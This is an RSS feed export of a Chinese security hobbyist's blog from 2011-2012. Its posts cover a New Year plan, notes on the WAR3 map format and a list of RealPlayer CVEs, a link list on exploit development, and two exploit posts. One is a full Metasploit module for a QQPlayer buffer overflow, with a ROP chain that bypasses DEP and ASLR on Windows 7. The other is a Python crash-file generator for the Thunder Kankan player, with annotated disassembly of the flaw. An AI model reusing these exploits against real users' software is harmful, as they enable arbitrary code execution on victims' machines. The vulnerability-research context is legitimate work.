<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>CQ-CSER</title>
	<atom:link href="http://cq-cser.cn/feed/" rel="self" type="application/rss+xml" />
	<link>http://cq-cser.cn</link>
	<description>计算机爱好者</description>
	<lastBuildDate>Sun, 15 Jan 2012 08:17:54 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>2012</title>
		<link>http://cq-cser.cn/2012/01/2012/</link>
		<comments>http://cq-cser.cn/2012/01/2012/#comments</comments>
		<pubDate>Sun, 15 Jan 2012 08:17:54 +0000</pubDate>
		<dc:creator>cq</dc:creator>
				<category><![CDATA[其他]]></category>

		<guid isPermaLink="false">http://cq-cser.cn/?p=1540</guid>
		<description><![CDATA[新年快到了，昨天到家了，整理下最近买的，强的，别人送的 各种怀念啊！ 新年要有新计划，还是写下来约束力大点。 1.OS,BROWSER,MUTIL PLAYER 3个重点方向要有成果 2.完善理论，开发自用工具，向大虾学习。 3.忘记一些东东，稳定下来，培养新习惯。 4.实践新技术方向 No related posts.


No related posts.]]></description>
			<content:encoded><![CDATA[<p><span id="more-1540"></span>新年快到了，昨天到家了，整理下最近买的，强的，别人送的</p>
<p style="text-align: center;"><a href="http://cq-cser.cn/wp-content/uploads/2012/01/CIMG3346.jpg"><img class="aligncenter size-large wp-image-1541" title="CIMG3346" src="http://cq-cser.cn/wp-content/uploads/2012/01/CIMG3346-1024x768.jpg" alt="" width="614" height="461" /></a></p>
<p style="text-align: left;">各种怀念啊！</p>
<p style="text-align: left;">新年要有新计划，还是写下来约束力大点。</p>
<p style="text-align: left;">1.OS,BROWSER,MUTIL PLAYER 3个重点方向要有成果</p>
<p style="text-align: left;">2.完善理论，开发自用工具，向大虾学习。</p>
<p style="text-align: left;">3.忘记一些东东，稳定下来，培养新习惯。</p>
<p style="text-align: left;">4.实践新技术方向</p>


<p>No related posts.</p>]]></content:encoded>
			<wfw:commentRss>http://cq-cser.cn/2012/01/2012/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WAR3格式</title>
		<link>http://cq-cser.cn/2011/12/war3%e6%a0%bc%e5%bc%8f/</link>
		<comments>http://cq-cser.cn/2011/12/war3%e6%a0%bc%e5%bc%8f/#comments</comments>
		<pubDate>Mon, 12 Dec 2011 09:13:46 +0000</pubDate>
		<dc:creator>cq</dc:creator>
				<category><![CDATA[sec]]></category>

		<guid isPermaLink="false">http://cq-cser.cn/?p=1534</guid>
		<description><![CDATA[本来是考虑w3g格式的 参见如下 http://w3g.deepnode.de/files/w3g_format.txt 大致包含部分： 版本头 压缩数据 解压出来包含各类时间，动作等。用的是ZLIB解压 ///////////////////////////////////////////////////////////////////////////////////////////////////// 后来想了下，用录像不如用地图，随便打开一个 00000000h: 48 4D 33 57 00 00 00 00 E5 8F AA E6 98 AF E5 8F ; HM3W&#8230;.鍙槸鍙 00000010h: A6 E5 A4 96 E4 B8 80 E5 BC A0 E9 AD 94 E5 85 BD ; ﹀涓€寮犻瓟鍏? 00000020h: E4 BA 89 E9 9C B8 49 [...]


No related posts.]]></description>
			<content:encoded><![CDATA[<p>本来是考虑w3g格式的<br />
参见如下</p>
<p>http://w3g.deepnode.de/files/w3g_format.txt</p>
<p>大致包含部分：<br />
版本头<br />
压缩数据</p>
<p>解压出来包含各类时间，动作等。用的是ZLIB解压<br />
/////////////////////////////////////////////////////////////////////////////////////////////////////<br />
后来想了下，用录像不如用地图，随便打开一个</p>
<div id="_mcePaste">00000000h: 48 4D 33 57 00 00 00 00 E5 8F AA E6 98 AF E5 8F ; HM3W&#8230;.鍙槸鍙</div>
<div id="_mcePaste">00000010h: A6 E5 A4 96 E4 B8 80 E5 BC A0 E9 AD 94 E5 85 BD ; ﹀涓€寮犻瓟鍏?</div>
<div id="_mcePaste">00000020h: E4 BA 89 E9 9C B8 49 49 49 E7 9A 84 E5 9C B0 E5 ; 浜夐湼III鐨勫湴?</div>
<div id="_mcePaste">00000030h: 9B BE 00 14 9C 00 00 01 00 00 00 00 00 00 00 00 ; 浘..?&#8230;&#8230;&#8230;.</div>
<div id="_mcePaste">00000040h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; &#8230;&#8230;&#8230;&#8230;&#8230;.</div>
<div>
<div>00000200h: 4D 50 51 1A 20 00 00 00 12 34 56 78 11 11 11 11 ; MPQ. &#8230;.4Vx&#8230;.</div>
<div>00000210h: A1 38 00 00 A1 3C 00 00 40 00 00 00 10 00 00 00 ; ?..?..@&#8230;&#8230;.</div>
<div>00000220h: 24 00 00 00 8D 02 00 00 BF 04 00 00 FE 06 00 00 ; $&#8230;?..?..?..</div>
<div>00000230h: 25 09 00 00 54 0B 00 00 85 0D 00 00 93 0F 00 00 ; %&#8230;T&#8230;?..?..</div>
</div>
<div>猜测下包含文件头和MPQ2部分，我们随便修改下MPQ后面的数字，如上，1234567811111111，用WAR3打开，果然CRASH了哈，一次是内存不够，一次是异常。大胆猜测，直接读取值开辟空间？</div>
<div><span id="more-1534"></span></div>
<div>WAR3应该是VC6的老编译器的吧。作为一个忠实真三DOTA爱好者，唉</div>
<div>////////////////////////////////////////////////////////////</div>
<div>再来看最近的几个scada的 ，不管是溢出还是use-after-free，某人的入手点很好啊，从注册类型PROJECT文件处理入手。</div>
<div>////////////////////////////////////////////////////////////</div>
<div>另，REALPLAYER一次补了好多洞啊</div>
<div>
<div>REALPLAYER  QCP,AAC,MP3,SWF，RealAudio sipr  漏洞</div>
<div>CVE-2011-2945</div>
<div>RealPlayer SIPR Heap Buffer Overflow Vulnerability   （out of bound）http://wiki.multimedia.cx/index.php?title=RealAudio_sipr</div>
<div>CVE-2011-2946</div>
<div>RealPlayer ActiveX Remote Code Execution Vulnerability</div>
<div>CVE-2011-2947</div>
<div>RealPlayer Cross-Zone Scripting Remote Code Execution Vulnerability</div>
<div>CVE-2011-2952</div>
<div>RealPlayer Dialog Box Use After Free Vulnerability</div>
<div>CVE-2011-2953</div>
<div>RealPlayer ActiveX Browser Plugin Out of Bounds Vulnerability.</div>
<div>CVE-2011-2954</div>
<div>RealPlayer Embedded AutoUpdate Use After Free Vulnerability</div>
<div>CVE-2011-2955</div>
<div>RealPlayer Embedded Modal Dialog Use After Free Vulnerability</div>
<div>CVE-2011-1221</div>
<div>RealPlayer Cross-Zone Scripting Remote Code Execution Vulnerability</div>
</div>


<p>No related posts.</p>]]></content:encoded>
			<wfw:commentRss>http://cq-cser.cn/2011/12/war3%e6%a0%bc%e5%bc%8f/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS</title>
		<link>http://cq-cser.cn/2011/11/qqplayer-pict-pnsize-buffer-overflow-win7-dep_aslr-bypass/</link>
		<comments>http://cq-cser.cn/2011/11/qqplayer-pict-pnsize-buffer-overflow-win7-dep_aslr-bypass/#comments</comments>
		<pubDate>Mon, 21 Nov 2011 08:26:22 +0000</pubDate>
		<dc:creator>cq</dc:creator>
				<category><![CDATA[其他]]></category>

		<guid isPermaLink="false">http://cq-cser.cn/?p=1531</guid>
		<description><![CDATA[http://cq-cser.cn/wp-content/plugins/downloads-manager/upload/qqplayer.rb 样本： http://115.com/file/cl3naedv http://115.com/file/aqu3qzmk # Exploit Title: QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS # Date: 2011,11,21 # Author: hellok(warptencq[at]gmail.com) # Software Link: http://dl_dir.qq.com/invc/qqplayer/QQPlayer_Setup_32_845.exe # Version: 32_845(lastest) # Tested on: WIN7 require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS', [...]


Related posts:<ol><li><a href='http://cq-cser.cn/2011/11/what_ever/' rel='bookmark' title='Permanent Link: 记事'>记事</a></li>
<li><a href='http://cq-cser.cn/2011/11/kankan-stackoverflowdos-exploit/' rel='bookmark' title='Permanent Link: thunder_kankan_stack_overflow/dos exploit'>thunder_kankan_stack_overflow/dos exploit</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p><a href="http://cq-cser.cn/wp-content/plugins/downloads-manager/upload/qqplayer.rb">http://cq-cser.cn/wp-content/plugins/downloads-manager/upload/qqplayer.rb</a><br />
样本：</p>
<p>http://115.com/file/cl3naedv</p>
<p>http://115.com/file/aqu3qzmk</p>
<p><code># Exploit Title: QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS<br />
# Date: 2011,11,21<br />
# Author: hellok(warptencq[at]gmail.com)<br />
# Software Link: http://dl_dir.qq.com/invc/qqplayer/QQPlayer_Setup_32_845.exe<br />
# Version: 32_845(lastest)<br />
# Tested on: WIN7<span id="more-1531"></span><br />
require 'msf/core'<br />
class Metasploit3 < Msf::Exploit::Remote<br />
	include Msf::Exploit::FILEFORMAT</p>
<p>	def initialize(info = {})<br />
		super(update_info(info,<br />
			'Name'           => 'QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS',<br />
			'Description'    => %q{<br />
					This module exploits a vulnerability in QQPLAYER Player 3.2.<br />
				When opening a .mov file containing a specially crafted PnSize value, an attacker<br />
				may be able to execute arbitrary code.<br />
			},<br />
			'License'        => MSF_LICENSE,<br />
			'Author'         =><br />
				[<br />
					'hellok',  #special thank corelanc0d3r for 'mona'<br />
				],<br />
			'References'     =><br />
				[<br />
				],<br />
			'DefaultOptions' =><br />
				{<br />
					'EXITFUNC' => 'process',<br />
					'DisablePayloadHandler' => 'true',<br />
				},<br />
			'Payload'        =><br />
				{<br />
					'Space'          => 750,<br />
					'BadChars'       => "",  #Memcpy<br />
					'EncoderType'    => Msf::Encoder::Type::AlphanumUpper,<br />
					'DisableNops'    =>  'True',<br />
					'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",<br />
					'EncoderOptions' =><br />
						{<br />
							'BufferRegister' => 'ECX',<br />
						},<br />
				},<br />
			'Platform' => 'win',<br />
			'Targets'        =><br />
				[<br />
					[ 'Windows 7', { 'Ret' => 0x67664cde } ],<br />
				],<br />
			'Privileged'     => false,<br />
			'DisclosureDate' => '11 21 2011',<br />
			'DefaultTarget'  => 0))</p>
<p>		register_options(<br />
			[<br />
				OptString.new('FILENAME',   [ false, 'The file name.',  'msf.mov' ]),<br />
			], self.class)<br />
	end<br />
	def exploit<br />
		# !mona rop<br />
		rop_gadgets =<br />
		[</p>
<p>			0x00418007,	# POP ECX # RETN (QQPlayer.exe)<br />
			0x12345678,<br />
			0x67664CE4,<br />
			0x01020304,<br />
			0x10203040,<br />
			0x22331122,<br />
			0x23456789,</p>
<p>			0x00418007,	# POP ECX # RETN (QQPlayer.exe)<br />
			0x00a9c18c,	# <- *&#038;VirtualProtect()<br />
			0x0054f100,	# MOV EAX,DWORD PTR DS:[ECX] # RETN (QQPlayer.exe)<br />
			#0x008e750c, LEA ESI,EAX # RETN (QQPlayer.exe)<br />
			0x008cf099,	# XCHG EAX,ESI # RETN</p>
<p>			0x6497aaad,	# POP EBP # RETN (avformat-52.dll)<br />
			0x100272bf,	# ptr to 'call esp' (from i18nu.dll)<br />
			0x005fc00b,	# POP EBX # RETN (QQPlayer.exe)<br />
			0x00000331,	# <- change size to mark as executable if needed (-> ebx)<br />
			0x00418007,	# POP ECX # RETN (QQPlayer.exe)<br />
			0x63d18000,	# RW pointer (lpOldProtect) (-> ecx)<br />
			0x63d05001,	# POP EDI # RETN (avutil-49.dll)<br />
			0x63d05002,	# ROP NOP (-> edi)<br />
			0x008bf00b,	# POP EDX # RETN (QQPlayer.exe)<br />
			0x00000040,	# newProtect (0x40) (-> edx)<br />
			0x00468800,	# POP EAX # RETN (QQPlayer.exe)<br />
			0x90909090,	# NOPS (-> eax)<br />
			0x008bad5c,	# PUSHAD # RETN (QQPlayer.exe)<br />
		# rop chain generated by mona.py<br />
		# note : this chain may not work out of the box<br />
		# you may have to change order or fix some gadgets,<br />
		# but it should give you a head start<br />
		].pack("V*")</p>
<p>		stackpivot = [target.ret].pack('L')</p>
<p>		buffer =rand_text_alpha_upper(90)#2<br />
		buffer << rop_gadgets<br />
		buffer << payload.encoded</p>
<p>		junk = rand_text_alpha_upper(2306 - buffer.length)</p>
<p>		buffer << junk<br />
		buffer << stackpivot<br />
		buffer << rand_text_alpha_upper(3000)#3000</p>
<p>		path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2011-0257.mov" )<br />
		fd = File.open(path, "rb" )<br />
		sploit = fd.read(fd.stat.size)<br />
		fd.close</p>
<p>		sploit << buffer</p>
<p>		file_create(sploit)<br />
	end<br />
end<br />
</code></p>


<p>Related posts:<ol><li><a href='http://cq-cser.cn/2011/11/what_ever/' rel='bookmark' title='Permanent Link: 记事'>记事</a></li>
<li><a href='http://cq-cser.cn/2011/11/kankan-stackoverflowdos-exploit/' rel='bookmark' title='Permanent Link: thunder_kankan_stack_overflow/dos exploit'>thunder_kankan_stack_overflow/dos exploit</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://cq-cser.cn/2011/11/qqplayer-pict-pnsize-buffer-overflow-win7-dep_aslr-bypass/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>thunder_kankan_stack_overflow/dos exploit</title>
		<link>http://cq-cser.cn/2011/11/kankan-stackoverflowdos-exploit/</link>
		<comments>http://cq-cser.cn/2011/11/kankan-stackoverflowdos-exploit/#comments</comments>
		<pubDate>Thu, 17 Nov 2011 14:56:32 +0000</pubDate>
		<dc:creator>cq</dc:creator>
				<category><![CDATA[sec]]></category>

		<guid isPermaLink="false">http://cq-cser.cn/?p=1522</guid>
		<description><![CDATA[http://cq-cser.cn/wp-content/plugins/downloads-manager/upload/kankan.py print &#8220;&#8221;" #1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 #0      ___           ___           ___       ___       ___           ___     1 #1     /\__\         /\  \         /\__\     /\__\ [...]


Related posts:<ol><li><a href='http://cq-cser.cn/2010/01/internet-explorer-aurora-exploit/' rel='bookmark' title='Permanent Link: Internet Explorer Aurora Exploit'>Internet Explorer Aurora Exploit</a></li>
<li><a href='http://cq-cser.cn/2010/01/zzrising-antivirus-200820092010-local-privilege-escalation-exploit/' rel='bookmark' title='Permanent Link: [zz]Rising AntiVirus 2008/2009/2010 Local Privilege Escalation Exploit'>[zz]Rising AntiVirus 2008/2009/2010 Local Privilege Escalation Exploit</a></li>
<li><a href='http://cq-cser.cn/2010/09/%e5%85%b3%e4%ba%8eesp%e5%ae%9a%e5%be%8b/' rel='bookmark' title='Permanent Link: 关于esp定律'>关于esp定律</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<div id="_mcePaste">
<div id="_mcePaste"><a href="http://cq-cser.cn/wp-content/plugins/downloads-manager/upload/kankan.py">http://cq-cser.cn/wp-content/plugins/downloads-manager/upload/kankan.py</a></div>
<div>print &#8220;&#8221;"</div>
<div id="_mcePaste">#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0</div>
<div id="_mcePaste">#0      ___           ___           ___       ___       ___           ___     1</div>
<div id="_mcePaste">#1     /\__\         /\  \         /\__\     /\__\     /\  \         /\__\    0</div>
<div id="_mcePaste">#0    /:/  /        /::\  \       /:/  /    /:/  /    /::\  \       /:/  /    1</div>
<div id="_mcePaste">#1   /:/__/        /:/\:\  \     /:/  /    /:/  /    /:/\:\  \     /:/__/     0</div>
<div id="_mcePaste">#0  /::\  \ ___   /::\~\:\  \   /:/  /    /:/  /    /:/  \:\  \   /::\__\____ 1</div>
<div id="_mcePaste">#1 /:/\:\  /\__\ /:/\:\ \:\__\ /:/__/    /:/__/    /:/__/ \:\__\ /:/\:::::\__\0</div>
<div id="_mcePaste">#0 \/__\:\/:/  / \:\~\:\ \/__/ \:\  \    \:\  \    \:\  \ /:/  / \/_|:|~~|~   1</div>
<div id="_mcePaste">#1      \::/  /   \:\ \:\__\    \:\  \    \:\  \    \:\  /:/  /     |:|  |    0</div>
<div id="_mcePaste">#0      /:/  /     \:\ \/__/     \:\  \    \:\  \    \:\/:/  /      |:|  |    1</div>
<div id="_mcePaste">#1     /:/  /       \:\__\        \:\__\    \:\__\    \::/  /       |:|  |    0</div>
<div id="_mcePaste">#0     \/__/         \/__/         \/__/     \/__/     \/__/         \|__|    1</div>
<div id="_mcePaste">#1                                                                            0</div>
<div id="_mcePaste">#0  [+] Exploit Title: Thunder kankan player Stack overflow/DOS Exploit       1</div>
<div id="_mcePaste">#1  [+] Software Link: dl.xunlei.com/xmp.html                                 0</div>
<div id="_mcePaste">#0  [+] Software:  Thunder kankan player                                      1</div>
<div id="_mcePaste">#1  [+] Version :   4.8.3.840(last)                                           0</div>
<div id="_mcePaste">#0  [+] Tested On:  WIN 7                                                     1</div>
<div id="_mcePaste">#1  [+] Code by:  hellok(warptencq@gmail.com)                                 0</div>
<div id="_mcePaste">#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-1</div>
<div id="_mcePaste">&#8220;&#8221;"</div>
<div id="_mcePaste">filepath = &#8220;exploit.wav&#8221;</div>
<div id="_mcePaste">f = open(filepath, &#8220;wb&#8221;)</div>
<div id="_mcePaste">file = &#8216;\x52\x49\x46\x46\x62\xb8\x20\x20\x57\x41\x56\x45\x66\x6d\x74\x20&#8242;</div>
<div id="_mcePaste">f.write(file)</div>
<div id="_mcePaste">f.close()</div>
<div id="_mcePaste">print &#8220;Done..&#8221;</div>
</div>
<p><span id="more-1522"></span><br />
主要2出错误，都是没校验直接从文件中读出。<br />
bass_wv.dll中的<br />
seg002:10005C2D ; &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
seg002:10005C2D ; 148: clean_junk_part:<br />
seg002:10005C2D ; 149:         v17 = malloc(site_malloc_may_error);<br />
seg002:10005C2D<br />
seg002:10005C2D clean_junk_part:                        ; CODE XREF: seem_important+1BDj<br />
seg002:10005C2D                                         ; seem_important+245j<br />
seg002:10005C2D                 push    esi             ; Size<br />
seg002:10005C2E                 call    malloc          ;  /size = F2471B06 (-230221050.)可控<br />
seg002:10005C34 ; 150:         (**(memory1 + 112))(*(memory1 + 116), v17, site_malloc_may_error);// basedll(+116)<br />
seg002:10005C34                 mov     ecx, [ebp+74h]  ; 申请失败，导致EAX==00<br />
seg002:10005C37                 add     esp, 4<br />
seg002:10005C3A                 mov     edi, eax        ; eax==0000  污染源<br />
seg002:10005C3C                 mov     eax, [ebp+70h]<br />
seg002:10005C3F                 push    esi<br />
seg002:10005C40                 mov     edx, edi<br />
seg002:10005C42                 call    dword ptr [eax] ; call base.dll!!!!!!!!!!!!!!!!<br />
seg002:10005C42                                         ; 从文件里读ECX大小内容到刚开辟空间<br />
seg002:10005C44 ; 151:         free(v17);<br />
seg002:10005C44                 push    edi             ; Memory<br />
seg002:10005C45                 call    free<br />
seg002:10005C4B ; 152:         strncpy_ = strncmp;<br />
seg002:10005C4B                 mov     edi, strncmp<br />
seg002:10005C51                 add     esp, 4<br />
seg002:10005C54                 jmp     loc_10005AF7</p>
<p>另一来自base.dll<br />
seg000:1001083D                 pop     eax<br />
seg000:1001083E ; 100:       if ( v66 &gt; 0&#215;12 )  v66可控污染源<br />
seg000:1001083E                 cmp     [ebp+var_10], eax<br />
seg000:10010841                 jbe     short crash_inside<br />
seg000:10010843 ; 101:         v14 = v66;<br />
seg000:10010843                 mov     eax, [ebp+var_10]<br />
seg000:10010846 ; 102:       v15 = v14 + 3;<br />
seg000:10010846<br />
seg000:10010846 crash_inside:                           ; CODE XREF: crash_here__+242j<br />
seg000:10010846                 add     eax, 3<br />
seg000:10010849 ; 103:       LOBYTE(v15) = v15 &amp; 0xFC;<br />
seg000:10010849                 and     al, 0FCh<br />
seg000:1001084B ; 104:       v16 = alloca(v15);<br />
seg000:1001084B                 call    __alloca_probe<br />
seg000:10010850 ; 105:       v4 = &amp;v39;<br />
seg000:10010850                 mov     ebx, esp<br />
seg000:10010852 ; 106:       sub_10001974(v5, &amp;v39, v66);</p>
<p>bass_wv.dll的里面看了半天,想搞个什么use after free,double free什么的,可惜没找到啊,小遗憾啦</p>


<p>Related posts:<ol><li><a href='http://cq-cser.cn/2010/01/internet-explorer-aurora-exploit/' rel='bookmark' title='Permanent Link: Internet Explorer Aurora Exploit'>Internet Explorer Aurora Exploit</a></li>
<li><a href='http://cq-cser.cn/2010/01/zzrising-antivirus-200820092010-local-privilege-escalation-exploit/' rel='bookmark' title='Permanent Link: [zz]Rising AntiVirus 2008/2009/2010 Local Privilege Escalation Exploit'>[zz]Rising AntiVirus 2008/2009/2010 Local Privilege Escalation Exploit</a></li>
<li><a href='http://cq-cser.cn/2010/09/%e5%85%b3%e4%ba%8eesp%e5%ae%9a%e5%be%8b/' rel='bookmark' title='Permanent Link: 关于esp定律'>关于esp定律</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://cq-cser.cn/2011/11/kankan-stackoverflowdos-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Blogs, Feeds, Guides &amp; Links[zz]</title>
		<link>http://cq-cser.cn/2011/11/blogs-feeds-guides-linkszz/</link>
		<comments>http://cq-cser.cn/2011/11/blogs-feeds-guides-linkszz/#comments</comments>
		<pubDate>Sun, 13 Nov 2011 10:33:15 +0000</pubDate>
		<dc:creator>cq</dc:creator>
				<category><![CDATA[sec]]></category>

		<guid isPermaLink="false">http://cq-cser.cn/?p=1520</guid>
		<description><![CDATA[原文：http://g0tmi1k.blogspot.com/2011/11/blog-guides-links.html 顺便FK GFW 特别推荐http://j00ru.vexillium.org/?p=893此系列 Programming/Coding [Bash] Advanced Bash-Scripting Guide &#8211; http://tldp.org/LDP/abs/html/ [Bash] Bash shell scripting tutorial &#8211; http://steve-parker.org/sh/sh.shtml [Bash] Bourne Shell Reference &#8211; http://linuxreviews.org/beginner/bash_GNU_Bourne-Again_SHell_Reference/ [CheatSheet] Scripting Languages: PHP, Perl, Python, Ruby &#8211; http://hyperpolyglot.org/scripting Offensive Security&#8217;s Pentesting With BackTrack (PWB) Course [Pre-course] Corelan Team &#8211; http://www.corelan.be [Pre-course] The Penetration Testing Execution Standard &#8211; http://www.pentest-standard.org/index.php/Main_Page [Hash] NTLM [...]


Related posts:<ol><li><a href='http://cq-cser.cn/2011/10/recent-life/' rel='bookmark' title='Permanent Link: recent life'>recent life</a></li>
<li><a href='http://cq-cser.cn/2010/01/internet-explorer-aurora-exploit/' rel='bookmark' title='Permanent Link: Internet Explorer Aurora Exploit'>Internet Explorer Aurora Exploit</a></li>
<li><a href='http://cq-cser.cn/2010/01/top-ten-web-hacking-techniques-of-2009/' rel='bookmark' title='Permanent Link: Top Ten Web Hacking Techniques of 2009!'>Top Ten Web Hacking Techniques of 2009!</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>原文：http://g0tmi1k.blogspot.com/2011/11/blog-guides-links.html<br />
顺便FK GFW<br />
特别推荐http://j00ru.vexillium.org/?p=893此系列<span id="more-1520"></span></p>
<p>Programming/Coding<br />
[Bash] Advanced Bash-Scripting Guide &#8211; http://tldp.org/LDP/abs/html/<br />
[Bash] Bash shell scripting tutorial &#8211; http://steve-parker.org/sh/sh.shtml<br />
[Bash] Bourne Shell Reference &#8211; http://linuxreviews.org/beginner/bash_GNU_Bourne-Again_SHell_Reference/<br />
[CheatSheet] Scripting Languages: PHP, Perl, Python, Ruby &#8211; http://hyperpolyglot.org/scripting</p>
<p>Offensive Security&#8217;s Pentesting With BackTrack (PWB) Course<br />
[Pre-course] Corelan Team &#8211; http://www.corelan.be<br />
[Pre-course] The Penetration Testing Execution Standard &#8211; http://www.pentest-standard.org/index.php/Main_Page<br />
[Hash] NTLM Decrypter &#8211; http://www.md5decrypter.co.uk/ntlm-decrypt.aspx<br />
[Hash] reverse hash search and calculator &#8211; http://goog.li</p>
<p>http://security.crudtastic.com/?p=213</p>
<p>Tunnelling / Pivoting<br />
[Linux] SSH gymnastics with proxychains &#8211; http://pauldotcom.com/2010/03/ssh-gymnastics-with-proxychain.html<br />
[Windows] Nessus Through SOCKS Through Meterpreter &#8211; http://www.digininja.org/blog/nessus_over_sock4a_over_msf.php</p>
<p>WarGames / Online Challenges<br />
[WarGames] Title &#8211; http://securityoverride.com<br />
[WarGames] Title &#8211; http://intruded.net<br />
[Challenge] The Ksplice Pointer Challenge &#8211; http://blogs.oracle.com/ksplice/<br />
[WarGames] Title &#8211; http://spotthevuln.com<br />
[WarGames] Title &#8211; http://cvo-lab.blogspot.com/2011/05/iawacs-2011-forensics-challenge.html<br />
[WarGames] Title &#8211; http://ftp.hackerdom.ru/ctf-images/</p>
<p>Exploit Development (Programs)<br />
[Download] Title &#8211; http://www.oldapps.com/<br />
[Download] Title &#8211; http://www.oldversion.com/<br />
[Download] Title &#8211; http://www.exploit-db.com/webapps/</p>
<p>Misc<br />
[RSS] Open Penetration Testing Bookmarks Collection &#8211; https://code.google.com/p/pentest-bookmarks/downloads/list<br />
[ExploitDev] Data mining Backtrack 4 for buffer overflow return addresses  &#8211; http://insidetrust.blogspot.com/2010/12/data-mining-backtrack-4-for-buffer.html<br />
[DIY] Repair a Broken Ethernet Plug &#8211; http://www.instructables.com/id/Repair-a-Broken-Ethernet-Plug/step5/Make-its-Head-Thin/<br />
[Desktop] Ubuntu Security &#8211; http://ubuntuforums.org/showthread.php?t=510812<br />
[TechHumor] Title &#8211; https://www.xkcd.com<br />
[TechHumor] Title &#8211; http://www.blackhat.com/presentations/bh-europe-05/BH_EU_05-Long.pdf </p>
<p>Exploit Development<br />
[Guides] Corelan Team &#8211; http://www.corelan.be<br />
[Guide] From 0&#215;90 to 0x4c454554, a journey into exploitation.  &#8211; http://myne-us.blogspot.com/2010/08/from-0&#215;90-to-0x4c454554-journey-into.html<br />
[Guide] An Introduction to Fuzzing: Using fuzzers (SPIKE) to find vulnerabilities &#8211; http://resources.infosecinstitute.com/intro-to-fuzzing/<br />
[Video] TiGa&#8217;s Video Tutorial Series on IDA Pro &#8211; http://www.woodmann.com/TiGa/idaseries.html<br />
[Guide] Advanced Windows Buffer Overflows &#8211; http://labs.snort.org/awbo/<br />
[Guide] Stack Based Windows Buffer Overflow Tutorial &#8211; http://grey-corner.blogspot.com/2010/01/beginning-stack-based-buffer-overflow.htmlt<br />
[Guide] SEH Stack Based Windows Buffer Overflow Tutorial &#8211; http://grey-corner.blogspot.com/2010/01/seh-stack-based-windows-buffer-overflow.html<br />
[Guide] Windows Buffer Overflow Tutorial: Dealing with Character Translation &#8211; http://grey-corner.blogspot.com/2010/01/windows-buffer-overflow-tutorial.html<br />
[Guide] Heap Spray Exploit Tutorial: Internet Explorer Use After Free Aurora Vulnerability< &#8211; http://grey-corner.blogspot.com/2010/01/heap-spray-exploit-tutorial-internet.html<br />
[Guide] Windows Buffer Overflow Tutorial: An Egghunter and a Conditional Jump &#8211; http://grey-corner.blogspot.com/2010/02/windows-buffer-overflow-tutorial.html<br />
[Linux] Linux exploit development part 1 – Stack overflow. &#8211; http://sickness.tor.hu/?p=363<br />
[Linux] Linux Exploit Writing Tutorial Pt 2 – Stack Overflow ASLR bypass Using ret2reg &#8211; http://sickness.tor.hu/?p=365<br />
[Linux] Linux exploit development part 3 – ret2libc &#8211; http://sickness.tor.hu/?p=368<br />
[Linux] Linux exploit development part 4 – ASCII armor bypass + return-to-plt &#8211; http://sickness.tor.hu/?p=378<br />
[TechHumor] Title &#8211; https://www.youtube.com/watch?v=klXFqtYR5Mg<br />
[TechHumor] Title &#8211; http://amolnaik4.blogspot.com/2011/06/exploit-development-with-monapy.html</p>
<p>Exploit Development (Case Studies/Walkthroughs)<br />
[Web] Finding 0days in Web Applications &#8211; http://www.exploit-db.com/finding-0days-in-web-applications/<br />
[Windows] Offensive Security Exploit Weekend &#8211; http://www.corelan.be/index.php/2010/11/13/offensive-security-exploit-weekend/<br />
[Windows] From vulnerability to exploit under 5 min  &#8211; http://0entropy.blogspot.com/2011/02/from-vulnerability-to-exploit-under-5.html</p>
<p>Exploit Development (Patch Analysis)<br />
[Windows] A deeper look at ms11-058 &#8211; http://www.skullsecurity.org/blog/2011/a-deeper-look-at-ms11-058<br />
[Windows] Patch Analysis for MS11-058 &#8211; https://community.qualys.com/blogs/securitylabs/2011/08/23/patch-analysis-for-ms11-058<br />
[Windows] CVE-2011-1281: A story of a Windows CSRSS Privilege Escalation vulnerability &#8211; http://j00ru.vexillium.org/?p=893<br />
[Mobile] Analyzing and dissecting Android applications for security defects and vulnerabilities &#8211; https://www.net-security.org/article.php?id=1613</p>
<p>Exploit Development (Metasploit Wishlist)<br />
